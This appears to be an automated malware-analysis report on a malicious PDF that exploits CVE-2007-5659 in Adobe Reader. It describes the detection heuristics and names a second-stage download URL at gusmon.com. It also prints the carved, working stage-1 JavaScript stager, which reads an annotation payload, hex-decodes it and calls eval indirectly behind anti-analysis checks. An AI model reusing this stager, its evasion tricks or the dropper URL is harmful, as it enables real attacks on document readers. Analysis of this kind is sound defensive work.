Verdict: MALICIOUS (Risk Score: 406)

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1071.001 Web Protocols
The PDF contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed as a dropper, downloading a second-stage payload from the URL http://gusmon.com/info/sun.html/n002106204r0409R1f79d67aXbbc075feY5b3152f0. The combination of String.fromCharCode hex decoding and anti-analysis checks indicates an intent to evade detection.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (11)
- Collab.collectEmailInfo — CVE-2007-5659 [critical; CVE exact; rule CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action [low; 5 related findings; rule PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [high; CVE likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE]: PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1), the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
- PDF JavaScript exploit cluster [critical; rule PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Obfuscated multi-stage PDF JavaScript dropper [high; rule PDF_JS_OBFUSCATED_DROPPER]: PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers: OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
- PDF JavaScript shellcode contains an embedded download URL [high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream [low; rule PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- ClamAV: Pdf.Exploit.Agent-35901 [critical; rule CLAMAV_DETECTION]: ClamAV detected this file as malware: Pdf.Exploit.Agent-35901.
- Annotation subject callee-key hex JavaScript stager [high; rule PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER]: PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
- Suspicious extracted artifact [info; rule EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; rule EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://gusmon.com/info/sun.html/n002106204r0409R1f79d67aXbbc075feY5b3152f0 (referenced by PDF JavaScript)
Extracted artifacts (3)
Files carved from inside the sample during analysis.

Artifact 1

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0009_000.js | pdf-javascript-stream | PDF /JS object 9 at offset 0x4143 | 469 bytes |

SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Detection (ClamAV): No threats found
Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):

```javascript
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
// Stage 1: read the encoded payload from an annotation's /Subject field.
if (app.plugIns.length != 0) {
    var num = 1;
    pr = app.doc.getAnnots({ nPage: 0 });
    sum = pr[num].subject;
}
var buf = "";
// Stage 2: hex-decode the dash-separated subject, one byte per token,
// while assembling the method name "eval" one character at a time.
if (app.plugIns.length > 3) {
    fnc += 'a';
    var arr = sum.split(/-/);
    for (var i = 1; i < arr.length; i++) {
        buf += String.fromCharCode("0x" + arr[i]);
    }
    fnc += 'l';
}
// Stage 3: indirect eval via app[fnc]; the plug-in count checks act
// as anti-analysis gates outside a full Reader environment.
if (app.plugIns.length >= 2) {
    app[fnc]/**/(buf);
}
```
Artifact 2

| Filename | Kind | Source | Size |
|---|---|---|---|
| annotation_subject_callee_hex_stage_000.js | deobfuscated-js | annotation-subject callee-key decoded JavaScript at offset 0x19EA | 5180 bytes |

SHA-256: 0c3cf693087f349a029a52f2e7fe2a6fba0e514886d010144bf80ffbdc3a6178
Detection (ClamAV): No threats found
Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
Artifact 3

| Filename | Kind | Source | Size |
|---|---|---|---|
| deobfuscated.js | deobfuscated-js | PDF JavaScript deobfuscation pass | 140126 bytes |

SHA-256: d9391bc5b6ed1899fbc7bd9b9f9d7dfbdba6577066cc1dc25aa27bfb5fa5606b
Detection (ClamAV): No threats found
Obfuscation or payload: likely (carved artifact contains 6 eval/decoder/string-building token(s) and 3 long base64-like blob(s))